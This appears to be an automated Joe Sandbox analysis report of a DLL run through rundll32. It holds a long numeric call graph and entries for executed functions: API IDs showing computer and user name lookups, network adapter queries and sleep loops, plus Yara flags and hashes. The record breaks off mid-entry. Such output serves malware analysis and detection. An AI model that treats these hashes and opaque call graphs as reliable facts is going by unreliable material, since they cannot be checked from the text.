14869 18002be35 14867->14869 14883 1800a2ce0 14868->14883 14869->14854 14871 18002c808 14872 1800a2ce0 77 API calls 14871->14872 14873 18002c815 14872->14873 14874 1800a2ce0 77 API calls 14873->14874 14875 18002c822 14874->14875 14876 1800a2ce0 77 API calls 14875->14876 14877 18002c82f 14876->14877 14878 1800a2ce0 77 API calls 14877->14878 14879 18002c83c 14878->14879 14880 1800a2ce0 77 API calls 14879->14880 14881 18002c84f 14880->14881 14882 1800a2ce0 77 API calls 14881->14882 14882->14869 14884 1800a2cf9 14883->14884 14894 1800a2d0a 14883->14894 14885 1800a2d04 14884->14885 14888 1800a2d1d 14884->14888 14886 1800a2ec1 14885->14886 14887 1800a2df6 14885->14887 14885->14894 14907 1800a0f70 14886->14907 14895 1800e96f0 14887->14895 14888->14886 14891 1800a2dbf 14888->14891 14888->14894 14893 1800e96f0 77 API calls 14891->14893 14893->14894 14894->14871 14896 180004410 77 API calls 14895->14896 14898 1800e9709 14896->14898 14897 1800e9729 14897->14894 14898->14897 14899 1800e972f 14898->14899 14902 180004410 77 API calls 14898->14902 14922 1800ea9f0 14899->14922 14901 1800e9739 14929 1800eab40 14901->14929 14902->14898 14904 1800e975a 14905 1800e96f0 77 API calls 14904->14905 14906 1800e9769 14905->14906 14906->14894 14951 1800a6110 14907->14951 14923 1800eaa0c 14922->14923 14924 1800eaa14 14923->14924 14925 1800eb0e0 77 API calls 14923->14925 14924->14901 14926 1800eaa37 14925->14926 14927 1800a2a20 77 API calls 14926->14927 14928 1800eaa3f 14927->14928 14930 1800f5510 77 API calls 14929->14930 14931 1800eab59 14930->14931 14943 1800eb710 14931->14943 14933 1800eabb4 14946 1800eac20 14933->14946 14935 1800eabcd 14935->14904 14937 1800eb180 77 API calls 14938 1800eac00 14937->14938 14939 1800a2a20 77 API calls 14938->14939 14940 1800eac08 14939->14940 14941 1800a2a20 77 API calls 14940->14941 14942 1800eac10 14941->14942 14945 1800eb722 14943->14945 14944 1800eb743 RaiseException 14944->14933 14945->14944 14947 1800eaa40 77 API calls 14946->14947 14948 1800eac31 14947->14948 14949 1800eb180 77 API calls 14948->14949 14950 1800eabbc 14949->14950 14950->14935 14950->14937 14952 1800ea9f0 77 API calls 14951->14952 14953 1800a6123 14952->14953 15107 1800a8820 14953->15107 14956 1800eab40 77 API calls 14957 1800a6147 14956->14957 15110 1800eb780 14957->15110 15116 1800f1c00 15107->15116 15109 1800a6131 15109->14956 15111 1800eb791 15110->15111 15112 1800eb8cf 15111->15112 15113 1800eb7bd RtlUnwindEx 15111->15113 15120 1800eb940 15112->15120 15115 1800eb8f2 15113->15115 15117 1800f1c25 15116->15117 15118 1800e96f0 77 API calls 15117->15118 15119 1800f1c31 15118->15119 15119->15109 15123 1800f5970 15120->15123 15122 1800eb96f 15122->15115 15124 1800f598a 15123->15124 15125 1800f5b1d 15124->15125 15127 1800ec290 RtlLookupFunctionEntry 15124->15127 15125->15122 15128 1800ec2bd 15127->15128 15128->15125 13925 180013d20 13926 180013d50 13925->13926 13927 1800144fa 13925->13927 13967 1800224f0 13926->13967 13928 1800145df 13927->13928 13932 180014758 13927->13932 13934 1800e94c4 77 API calls 13927->13934 13930 180013d72 13973 180022750 13930->13973 13933 180014765 GetCurrentThreadId 13932->13933 13939 180014779 13932->13939 13933->13939 13936 1800148a2 13934->13936 13935 180013d97 13935->13927 13938 180022750 99 API calls 13935->13938 13942 180013dd1 13935->13942 13936->13932 13937 1800148aa InitializeConditionVariable InitializeConditionVariable 13936->13937 13986 1800ea0b0 13937->13986 13938->13942 13947 1800147e5 13939->13947 13981 180015a46 13939->13981 13941 1800224f0 99 API calls 13957 180013ffe 13941->13957 13942->13927 13945 180022750 99 API calls 13942->13945 13948 180013e82 13942->13948 13943 180014945 13946 1800e959b 77 API calls 13943->13946 13945->13948 13946->13932 13949 180014879 13947->13949 13951 1800e94c4 77 API calls 13947->13951 13948->13927 13950 180022750 99 API calls 13948->13950 13958 180013f33 13948->13958 13950->13958 13952 180014988 13951->13952 13952->13949 13992 180015f10 InitializeConditionVariable 13952->13992 13953 180022750 99 API calls 13953->13957 13954 18001408d 13956 1800224f0 99 API calls 13954->13956 13965 18001411f 13956->13965 13957->13927 13957->13953 13957->13954 13958->13941 13960 1800ea0b0 79 API calls 13961 1800149b6 13960->13961 13962 1800e959b 77 API calls 13961->13962 13962->13949 13963 1800224f0 99 API calls 13963->13965 13964 180022750 99 API calls 13964->13965 13965->13927 13965->13963 13965->13964 13977 1800247d0 13965->13977 13970 18002252b 13967->13970 13969 180022750 99 API calls 13971 1800225c8 13969->13971 13970->13969 13970->13971 13995 180022660 13971->13995 13972 18002261f 13972->13930 13974 18002277a 13973->13974 13976 1800227ce 13973->13976 13974->13976 14102 18000ba90 13974->14102 13976->13935 13979 180024807 13977->13979 13978 180022750 99 API calls 13980 1800248a8 13978->13980 13979->13978 13979->13980 13980->13965 13982 18000ba90 99 API calls 13981->13982 13983 180015a85 13982->13983 13984 180015ae6 13983->13984 14145 180015b20 13983->14145 13984->13947 13986->13943 13988 1800ea0c0 13986->13988 13987 1800ea152 13987->13943 13988->13987 13989 180004460 77 API calls 13988->13989 13990 1800ea116 13989->13990 13990->13987 13991 1800ea11b EnterCriticalSection LeaveCriticalSection 13990->13991 13991->13987 13993 1800149a0 13992->13993 13994 180015f28 InitializeConditionVariable 13992->13994 13993->13960 13994->13993 13996 18002267d 13995->13996 13999 180022695 13995->13999 13996->13999 14001 1800229e0 13996->14001 13998 1800226d5 13998->13972 13999->13998 14000 1800229e0 99 API calls 13999->14000 14000->13998 14005 1800229f4 14001->14005 14002 180022a91 14008 180004410 14002->14008 14003 180022b79 14011 1800044b0 14003->14011 14005->14002 14005->14003 14007 180022aa1 14005->14007 14007->13999 14014 180007fb0 14008->14014 14010 18000443d 14010->14007 14027 1800086c0 14011->14027 14013 1800044e0 14015 1800080f0 75 API calls 14014->14015 14017 180007fc4 14015->14017 14016 180008060 14019 180007410 29 API calls 14016->14019 14017->14016 14018 180007fed 14017->14018 14023 180008042 14017->14023 14020 180008062 14018->14020 14021 180007ff6 EnterCriticalSection 14018->14021 14019->14023 14022 1800030a0 32 API calls 14020->14022 14024 180002000 26 API calls 14021->14024 14022->14023 14023->14010 14025 180008024 LeaveCriticalSection 14024->14025 14025->14023 14028 18000873f 14027->14028 14029 1800086e0 14027->14029 14030 1800080f0 77 API calls 14028->14030 14031 1800087c3 EnterCriticalSection 14029->14031 14038 180008704 14029->14038 14042 18000892b 14029->14042 14032 180008744 14030->14032 14034 1800087dc LeaveCriticalSection 14031->14034 14033 1800087be 14032->14033 14036 1800088a0 14032->14036 14037 180008765 14032->14037 14033->14013 14034->14038 14041 180007410 29 API calls 14036->14041 14039 1800088a2 14037->14039 14040 180008772 EnterCriticalSection 14037->14040 14038->14042 14044 180008879 14038->14044 14045 18000886f 14038->14045 14046 1800030a0 32 API calls 14039->14046 14043 180002000 26 API calls 14040->14043 14041->14033 14047 1800087a0 LeaveCriticalSection 14043->14047 14073 180003a20 14044->14073 14051 1800036a0 14045->14051 14046->14033 14047->14033 14053 1800036c2 14051->14053 14052 1800038da 14054 1800038f1 EnterCriticalSection 14052->14054 14055 18000395a 14052->14055 14053->14052 14057 180003784 14053->14057 14058 180003818 EnterCriticalSection 14053->14058 14070 180003735 14053->14070 14059 180002000 26 API calls 14054->14059 14056 180007410 29 API calls 14055->14056 14066 1800039aa 14056->14066 14063 180003795 EnterCriticalSection 14057->14063 14061 180003851 14058->14061 14062 1800038cf LeaveCriticalSection 14058->14062 14060 18000391f LeaveCriticalSection 14059->14060 14060->14066 14060->14070 14061->14062 14068 180001570 VirtualAlloc 14061->14068 14062->14052 14094 180002860 14063->14094 14066->14070 14096 180007980 EnterCriticalSection 14066->14096 14067 1800037e6 LeaveCriticalSection 14067->14070 14069 180003891 14068->14069 14069->14062 14071 180003895 LeaveCriticalSection 14069->14071 14070->14033 14071->14070 14074 180003b63 14073->14074 14075 180003a49 14073->14075 14077 1800030a0 32 API calls 14074->14077 14075->14074 14076 180003a67 14075->14076 14078 180003a93 14076->14078 14079 180003c1a 14076->14079 14080 180003bd0 14077->14080 14081 180003af2 EnterCriticalSection 14078->14081 14083 180003ac0 VirtualFree 14078->14083 14082 180003c84 EnterCriticalSection 14079->14082 14084 180003c50 VirtualAlloc 14079->14084 14093 180003c00 14079->14093 14089 180007980 3 API calls 14080->14089 14080->14093 14086 180003b0b 14081->14086 14082->14086 14083->14078 14085 180003d0f 14083->14085 14084->14079 14084->14093 14088 180003d72 EnterCriticalSection 14085->14088 14086->14085 14087 180003b57 LeaveCriticalSection 14086->14087 14087->14093 14091 180003dbe LeaveCriticalSection 14088->14091 14092 180003d9e LeaveCriticalSection 14088->14092 14089->14093 14092->14033 14093->14033 14095 180002887 14094->14095 14095->14067 14095->14094 14097 1800079a6 14096->14097 14098 180007abd 14097->14098 14099 180007a4a LeaveCriticalSection 14097->14099 14100 180001b40 14099->14100 14101 180007a8c EnterCriticalSection 14100->14101 14101->14098 14103 180004410 77 API calls 14102->14103 14104 18000ba9d 14103->14104 14105 18000baa7 14104->14105 14108 18000bac0 14104->14108 14105->13976 14107 18000bab5 14109 18000bafb 14108->14109 14110 180004460 77 API calls 14109->14110 14112 18000bb51 14110->14112 14111 18000bb60 14111->14107 14112->14111 14113 18000bac0 99 API calls 14112->14113 14114 18000bb7d 14113->14114 14115 1800044b0 99 API calls 14114->14115 14116 18000bb8d 14115->14116 14117 18000bb97 14116->14117 14118 18000bac0 99 API calls 14116->14118 14117->14107 14119 18000bba5 14118->14119 14132 180005bb0 14119->14132 14121 18000bbe1 14121->14107 14122 18000bbcc 14122->14121 14123 180004410 77 API calls 14122->14123 14124 18000bc44 14123->14124 14125 18000bac0 99 API calls 14124->14125 14126 18000bc6a 14125->14126 14142 180004590 14126->14142 14128 18000bc91 14128->14107 14129 18000bc7e 14129->14128 14130 18000bac0 99 API calls 14129->14130 14131 18000bca3 14130->14131 14133 180005bd3 14132->14133 14134 180007fb0 77 API calls 14133->14134 14136 180005bed 14134->14136 14135 180005c17 14135->14122 14136->14135 14137 180007fb0 77 API calls 14136->14137 14139 180005c71 14137->14139 14138 180005c9b 14138->14122 14139->14138 14140 1800080f0 77 API calls 14139->14140 14141 180005cc1 14140->14141 14141->14122 14143 1800080f0 77 API calls 14142->14143 14144 1800045a1 14143->14144 14144->14129 14146 180015b31 14145->14146 14147 180015b36 14145->14147 14146->13983 14147->14146 14148 18000ba90 99 API calls 14147->14148 14149 180015c09 GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 14148->14149 14151 180015c53 14149->14151 14150 180015c83 14150->13983 14151->14150 14152 18000ba90 99 API calls 14151->14152 14153 180015ccc GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 14152->14153 14155 180015d18 14153->14155 14154 180015d98 CloseHandle 14156 180015d37 14154->14156 14155->14154 14155->14156 14156->13983 15623 1800109a0 15624 18000ba90 99 API calls 15623->15624 15625 1800109bc 15624->15625 15626 180023d40 99 API calls 15625->15626 15627 1800109f5 15626->15627 15628 180022660 99 API calls 15627->15628 15629 180010a2c 15628->15629 15443 18000f360 15444 18000ba90 99 API calls 15443->15444 15445 18000f387 15444->15445 15446 18000ba90 99 API calls 15445->15446 15447 18000f394 15446->15447 15468 180023d40 15447->15468 15450 180022660 99 API calls 15451 18000f404 15450->15451 15452 1800224f0 99 API calls 15451->15452 15453 18000f440 15452->15453 15454 18000ba90 99 API calls 15453->15454 15455 18000f44d 15454->15455 15456 180023d40 99 API calls 15455->15456 15457 18000f47c 15456->15457 15458 180022660 99 API calls 15457->15458 15459 18000f4ac 15458->15459 15460 18000ba90 99 API calls 15459->15460 15461 18000f4ca 15460->15461 15462 180023d40 99 API calls 15461->15462 15463 18000f4f9 15462->15463 15464 180022660 99 API calls 15463->15464 15465 18000f544 15464->15465 15466 1800224f0 99 API calls 15465->15466 15467 18000f575 15466->15467 15469 18000ba90 99 API calls 15468->15469 15471 180023d55 15469->15471 15470 180023d8b 15474 18000f3cd 15470->15474 15482 1800241c0 15470->15482 15471->15470 15475 180023f60 15471->15475 15474->15450 15480 180023f74 15475->15480 15476 180023f81 15479 1800044b0 99 API calls 15476->15479 15481 180023fd0 15476->15481 15477 18002400b 15478 180004410 77 API calls 15477->15478 15478->15481 15479->15481 15480->15476 15480->15477 15480->15481 15481->15470 15481->15481 15486 1800241d6 15482->15486 15483 180024273 15485 180004410 77 API calls 15483->15485 15484 1800241e4 15487 180004410 77 API calls 15484->15487 15488 180024234 15484->15488 15485->15488 15486->15483 15486->15484 15486->15488 15487->15488 15488->15474 15630 1800011a0 15631 1800011c0 15630->15631 15632 180001229 15631->15632 15640 180001311 15631->15640 15645 180001010 15631->15645 15651 180053320 15632->15651 15636 18000120c 15636->15632 15639 180001330 15636->15639 15636->15640 15637 180053320 2 API calls 15641 180001264 15637->15641 15638 180001010 2 API calls 15638->15640 15639->15640 15642 180001370 Sleep 15639->15642 15641->15640 15643 1800012c0 15641->15643 15644 1800012b0 Sleep 15641->15644 15642->15640 15642->15642 15643->15638 15643->15640 15644->15643 15644->15644 15646 1800010ae 15645->15646 15648 18000102d 15645->15648 15647 1800010e0 Sleep 15646->15647 15649 180001080 15646->15649 15647->15646 15647->15649 15648->15649 15650 180001070 Sleep 15648->15650 15649->15636 15650->15649 15650->15650 15652 180001240 15651->15652 15653 180053329 DisableThreadLibraryCalls LoadLibraryExW 15651->15653 15652->15637 15652->15643 15653->15652 15654 180002da0 EnterCriticalSection 15655 180002000 26 API calls 15654->15655 15656 180002dde LeaveCriticalSection 15655->15656 15918 18000c0e0 16043 180053f70 15918->16043 15920 18000c126 15921 18000ba90 99 API calls 15920->15921 15922 18000c157 15920->15922 15926 18000c419 15920->15926 15921->15922 15928 18000c23b 15922->15928 16047 1800a2180 15922->16047 15924 18000c283 15925 18000c41e LoadLibraryExW 15924->15925 15924->15926 15925->15926 15932 18000c438 15925->15932 15927 18000ce84 FreeLibrary 15927->15926 15928->15924 15929 18000c390 GetModuleHandleW 15928->15929 15931 18000c306 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 15928->15931 15929->15924 15930 18000c3a2 GetModuleHandleW 15929->15930 15930->15924 15930->15926 15931->15924 15931->15929 15932->15927 16040 18000c988 15932->16040 16058 1800a23e0 15932->16058 15933 18000cc33 16116 18000d120 15933->16116 15934 18000ca1f RtlCompareMemory 15934->15933 15940 18000ca62 15934->15940 15937 18000c576 15938 1800a23e0 77 API calls 15937->15938 15939 18000c58a 15938->15939 15941 1800a23e0 77 API calls 15939->15941 15940->15933 16066 1800a7180 15940->16066 15943 18000c59e 15941->15943 15944 1800a23e0 77 API calls 15943->15944 15946 18000c5b2 15944->15946 15945 18000caae 15949 1800a1e80 77 API calls 15945->15949 15947 1800a23e0 77 API calls 15946->15947 15948 18000c5c6 15947->15948 15950 1800a23e0 77 API calls 15948->15950 15951 18000cae7 15949->15951 15952 18000c5da 15950->15952 15954 1800a23e0 77 API calls 15951->15954 15953 1800a23e0 77 API calls 15952->15953 15957 18000c5ee 15953->15957 15955 18000cb10 15954->15955 15958 1800a7180 77 API calls 15955->15958 15956 18000ccba 16120 18000d3e0 15956->16120 15959 1800a23e0 77 API calls 15957->15959 15960 18000cb20 15958->15960 15961 18000c5fd 15959->15961 15965 1800a1e80 77 API calls 15960->15965 15963 1800a23e0 77 API calls 15961->15963 15964 18000c613 15963->15964 15966 1800a23e0 77 API calls 15964->15966 15967 18000cb54 15965->15967 15968 18000c627 15966->15968 15970 1800a23e0 77 API calls 15967->15970 15969 1800a23e0 77 API calls 15968->15969 15971 18000c63b 15969->15971 15973 18000cb7d 15970->15973 15972 1800a23e0 77 API calls 15971->15972 15974 18000c64a 15972->15974 15975 1800a7180 77 API calls 15973->15975 15976 1800a23e0 77 API calls 15974->15976 15977 18000cb91 15975->15977 15978 18000c661 15976->15978 15980 1800a1e80 77 API calls 15977->15980 15979 1800a23e0 77 API calls 15978->15979 15981 18000c675 15979->15981 15982 18000cbc5 15980->15982 15983 1800a23e0 77 API calls 15981->15983 15985 1800a23e0 77 API calls 15982->15985 15984 18000c689 15983->15984 15986 1800a23e0 77 API calls 15984->15986 15987 18000cbee 15985->15987 15988 18000c698 15986->15988 15989 1800a7180 77 API calls 15987->15989 15990 1800a23e0 77 API calls 15988->15990 15991 18000cbff 15989->15991 15992 18000c6af 15990->15992 15996 1800a1e80 77 API calls 15991->15996 15993 1800a23e0 77 API calls 15992->15993 15995 18000c6be 15993->15995 15994 18000cd7f 15994->15927 15997 1800a23e0 77 API calls 15995->15997 15996->15933 15998 18000c6d5 15997->15998 15999 1800a23e0 77 API calls 15998->15999 16000 18000c6e4 15999->16000 16001 1800a23e0 77 API calls 16000->16001 16002 18000c6fb 16001->16002 16003 1800a23e0 77 API calls 16002->16003 16004 18000c70a 16003->16004 16005 1800a23e0 77 API calls 16004->16005 16006 18000c721 16005->16006 16007 1800a23e0 77 API calls 16006->16007 16008 18000c730 16007->16008 16009 1800a23e0 77 API calls 16008->16009 16010 18000c747 16009->16010 16011 1800a23e0 77 API calls 16010->16011 16012 18000c756 16011->16012 16013 1800a23e0 77 API calls 16012->16013 16014 18000c76d 16013->16014 16015 1800a23e0 77 API calls 16014->16015 16016 18000c77c 16015->16016 16017 1800a23e0 77 API calls 16016->16017 16018 18000c793 16017->16018 16019 1800a23e0 77 API calls 16018->16019 16020 18000c7a2 16019->16020 16021 1800a23e0 77 API calls 16020->16021 16022 18000c7b9 16021->16022 16023 1800a23e0 77 API calls 16022->16023 16024 18000c7c8 16023->16024 16025 1800a23e0 77 API calls 16024->16025 16026 18000c7d4 16024->16026 16025->16026 16027 1800a23e0 77 API calls 16026->16027 16028 18000c7dc 16026->16028 16027->16028 16029 1800a23e0 77 API calls 16028->16029 16030 18000c7e8 16028->16030 16029->16030 16031 1800a23e0 77 API calls 16030->16031 16033 18000c7f4 16030->16033 16031->16033 16032 18000c8e0 16037 1800a23e0 77 API calls 16032->16037 16034 1800a23e0 77 API calls 16033->16034 16035 18000c800 16033->16035 16034->16035 16036 1800a23e0 77 API calls 16035->16036 16038 18000c80c 16035->16038 16036->16038 16041 18000c8f4 16037->16041 16038->16032 16039 1800a23e0 77 API calls 16038->16039 16039->16032 16040->15933 16040->15934 16041->16040 16042 1800a2180 77 API calls 16041->16042 16042->16040 16044 180053f84 16043->16044 16125 180053ea0 WideCharToMultiByte 16044->16125 16046 180053f92 16046->15920 16048 1800a219f 16047->16048 16049 1800a21b0 16048->16049 16050 1800a2227 16048->16050 16052 1800a222f 16049->16052 16053 1800a21cc 16049->16053 16051 1800a0cb0 77 API calls 16050->16051 16051->16052 16054 1800a0f70 77 API calls 16052->16054 16055 1800a21d2 16053->16055 16056 1800e96f0 77 API calls 16053->16056 16057 1800a2237 16054->16057 16055->15928 16056->16055 16057->15928 16059 1800a2413 16058->16059 16060 1800a23fa 16058->16060 16059->16060 16061 1800a24d7 16059->16061 16065 1800a2477 16059->16065 16064 1800e96f0 77 API calls 16060->16064 16060->16065 16062 1800a0f70 77 API calls 16061->16062 16063 1800a24df 16062->16063 16064->16065 16065->15937 16067 1800a71a0 16066->16067 16068 1800a71ac 16067->16068 16069 1800a7219 16067->16069 16071 1800e96f0 77 API calls 16068->16071 16072 1800a71b5 16068->16072 16070 1800a0f70 77 API calls 16069->16070 16073 1800a7221 16070->16073 16071->16072 16072->15945 16074 1800a72cf 16073->16074 16075 1800a7420 16073->16075 16077 1800e96f0 77 API calls 16074->16077 16078 1800a72d5 16074->16078 16131 1800a3680 16075->16131 16077->16078 16078->15945 16079 1800a7428 16080 1800a74cf 16079->16080 16081 1800a7620 16079->16081 16083 1800e96f0 77 API calls 16080->16083 16084 1800a74d5 16080->16084 16082 1800a3680 77 API calls 16081->16082 16085 1800a7628 16082->16085 16083->16084 16084->15945 16086 1800a7830 16085->16086 16087 1800a76d6 16085->16087 16088 1800a3680 77 API calls 16086->16088 16089 1800e96f0 77 API calls 16087->16089 16091 1800a76dc 16087->16091 16090 1800a7838 16088->16090 16089->16091 16092 1800a7879 16090->16092 16093 1800a79c0 16090->16093 16091->15945 16095 1800e96f0 77 API calls 16092->16095 16099 1800a787f 16092->16099 16094 1800a3680 77 API calls 16093->16094 16096 1800a79c8 16094->16096 16095->16099 16097 1800a7a09 16096->16097 16098 1800a7b50 16096->16098 16102 1800e96f0 77 API calls 16097->16102 16105 1800a7a0f 16097->16105 16100 1800a3680 77 API calls 16098->16100 16099->15945 16099->16099 16101 1800a7b58 16100->16101 16103 1800a7b9a 16101->16103 16104 1800a7ce0 16101->16104 16102->16105 16107 1800e96f0 77 API calls 16103->16107 16110 1800a7ba0 16103->16110 16106 1800a3680 77 API calls 16104->16106 16105->15945 16105->16105 16108 1800a7ce8 16106->16108 16107->16110 16146 1800a24e0 16108->16146 16110->15945 16110->16110 16111 1800a7e03 16114 1800a24e0 77 API calls 16111->16114 16115 1800a7e17 16111->16115 16112 1800a7d29 16112->16111 16113 1800a24e0 77 API calls 16112->16113 16113->16112 16114->16115 16115->15945 16118 18000d181 16116->16118 16117 18000d1d7 16117->15956 16118->16117 16119 18000ba90 99 API calls 16118->16119 16119->16117 16121 18000d48e 16120->16121 16123 18000d3fb 16120->16123 16122 18000ba90 99 API calls 16121->16122 16124 18000d54e 16121->16124 16122->16124 16123->15994 16124->15994 16126 180053f2f 16125->16126 16127 180053eea 16125->16127 16126->16046 16128 18000ba90 99 API calls 16127->16128 16129 180053efa 16128->16129 16130 180053f0a WideCharToMultiByte 16129->16130 16130->16126 16132 1800a6110 77 API calls 16131->16132 16135 1800a3690 16132->16135 16133 1800a36b1 16133->16079 16134 1800a36d7 16136 1800a3680 77 API calls 16134->16136 16135->16133 16135->16134 16137 1800e96f0 77 API calls 16135->16137 16140 1800a3738 16136->16140 16137->16134 16138 1800a3751 16138->16079 16139 1800a3777 16142 1800a3680 77 API calls 16139->16142 16140->16138 16140->16139 16141 1800e96f0 77 API calls 16140->16141 16141->16139 16143 1800a37d8 16142->16143 16154 1800a3180 16143->16154 16145 1800a3813 16145->16079 16147 1800a24fc 16146->16147 16151 1800a2526 16146->16151 16148 1800a2639 16147->16148 16147->16151 16152 1800a2566 16147->16152 16149 1800a0f70 77 API calls 16148->16149 16150 1800a2641 16149->16150 16150->16112 16151->16112 16153 1800e96f0 77 API calls 16152->16153 16153->16151 16155 1800a31a3 16154->16155 16156 1800a3396 16155->16156 16157 1800a31bc 16155->16157 16169 1800a33a0 16156->16169 16161 1800a3219 16157->16161 16162 1800a33c0 16157->16162 16161->16145 16163 1800a350a 16162->16163 16165 1800a33ec 16162->16165 16164 1800a3680 77 API calls 16163->16164 16168 1800a3512 16164->16168 16166 1800e96f0 77 API calls 16165->16166 16165->16168 16167 1800a346a 16166->16167 16167->16161 16168->16161 16170 1800a6180 77 API calls 16169->16170 16171 1800a33b0 16170->16171 16172 18000d9e0 16173 1800224f0 99 API calls 16172->16173 16174 18000da2d 16173->16174 16175 180024a30 99 API calls 16174->16175 16176 18000da76 16175->16176 16177 180024a30 99 API calls 16176->16177 16178 18000dab0 16177->16178 16179 180022750 99 API calls 16178->16179 16182 18000db8a 16178->16182 16180 18000db20 16179->16180 16181 180024a30 99 API calls 16180->16181 16181->16182 16183 18000e1e0 16184 18000e243 16183->16184 16185 1800e94c4 77 API calls 16184->16185 16189 18000e550 16184->16189 16185->16189 16186 18000e606 16187 18000dd30 108 API calls 16187->16189 16188 1800e959b 77 API calls 16188->16189 16189->16186 16189->16187 16189->16188

                                                                                                                                              Executed Functions

                                                                                                                                              Function 000001752353112C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.836538938.0000017523531000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017523531000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_17523531000_rundll32.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Name$ComputerUser
                                                                                                                                              • String ID: x
                                                                                                                                              • API String ID: 4229901323-2363233923
                                                                                                                                              • Opcode ID: 9fbc47c956292bd57469b11716e1e3b46703ed17604a4a933446fe82612f1475
                                                                                                                                              • Instruction ID: c6a236440a2745628b17f03d0ed65bd54cc253e2eeb1a7807ee22c32e01019f7
                                                                                                                                              • Opcode Fuzzy Hash: 9fbc47c956292bd57469b11716e1e3b46703ed17604a4a933446fe82612f1475
                                                                                                                                              • Instruction Fuzzy Hash: 8741723125CE488BEB29EF14EC896E677F5F798311F40066ED44EC3166DAB4EA058B81
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0000017523532610 Relevance: 4.6, APIs: 3, Instructions: 134libraryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.836538938.0000017523531000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017523531000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_17523531000_rundll32.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AdaptersInfo$LibraryLoad
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 503213013-0
                                                                                                                                              • Opcode ID: 0b0ffc4dbaf202e72195ed55489aa3f4b30a4bbcdc90ca798ec3d2f1babc2a86
                                                                                                                                              • Instruction ID: 68e973508f5714a99c9a1aae6290ca6600e9629e84f7b992f44213dee8e7e85d
                                                                                                                                              • Opcode Fuzzy Hash: 0b0ffc4dbaf202e72195ed55489aa3f4b30a4bbcdc90ca798ec3d2f1babc2a86
                                                                                                                                              • Instruction Fuzzy Hash: E141D43135CE488FEB59EB68E8496E977E2EB99301F040129D90EC7163DEB4D9418BC1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 000001752353227C Relevance: 3.1, APIs: 2, Instructions: 109memorynativeCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.836538938.0000017523531000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017523531000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_17523531000_rundll32.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeapInformationQuerySystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3114120137-0
                                                                                                                                              • Opcode ID: bc88ae1891c6cbdd9aba24218a2c3f56d7c8a014d2773dbb0a60ff9a2212c3cb
                                                                                                                                              • Instruction ID: e1efa89cc9fd8828b86bc38613cfe1fa547b75823b29f01654110ca740bf4721
                                                                                                                                              • Opcode Fuzzy Hash: bc88ae1891c6cbdd9aba24218a2c3f56d7c8a014d2773dbb0a60ff9a2212c3cb
                                                                                                                                              • Instruction Fuzzy Hash: 1731753072CE458BFB98EB6DE8883A977E2FBA4301F40053AA54DC3152DE74D8458742
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0000017523520A58 Relevance: 1.9, APIs: 1, Instructions: 392memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000003.428621647.0000017523520000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017523520000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_3_17523520000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                              • Opcode ID: 91fac1145fe99ea4403ca83af3749138264ce160ba16b384ac32ca1fd5f6d395
                                                                                                                                              • Instruction ID: f202f56930db2dcf19825227f1cdedf418feb278442a370569fa9d4d157beaf2
                                                                                                                                              • Opcode Fuzzy Hash: 91fac1145fe99ea4403ca83af3749138264ce160ba16b384ac32ca1fd5f6d395
                                                                                                                                              • Instruction Fuzzy Hash: 55B1173032DE488BE76C9F2C8C456B577E6FF99315F10422DE89EC7297DA70E9428681
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0000017523532C20 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000A.00000002.836538938.0000017523531000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000017523531000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_10_2_17523531000_rundll32.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Sleep
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                              • Opcode ID: 570ea093171ef70ab32a71528cc7d048381a2e7ff00b26fdcbfa97036560c0e5
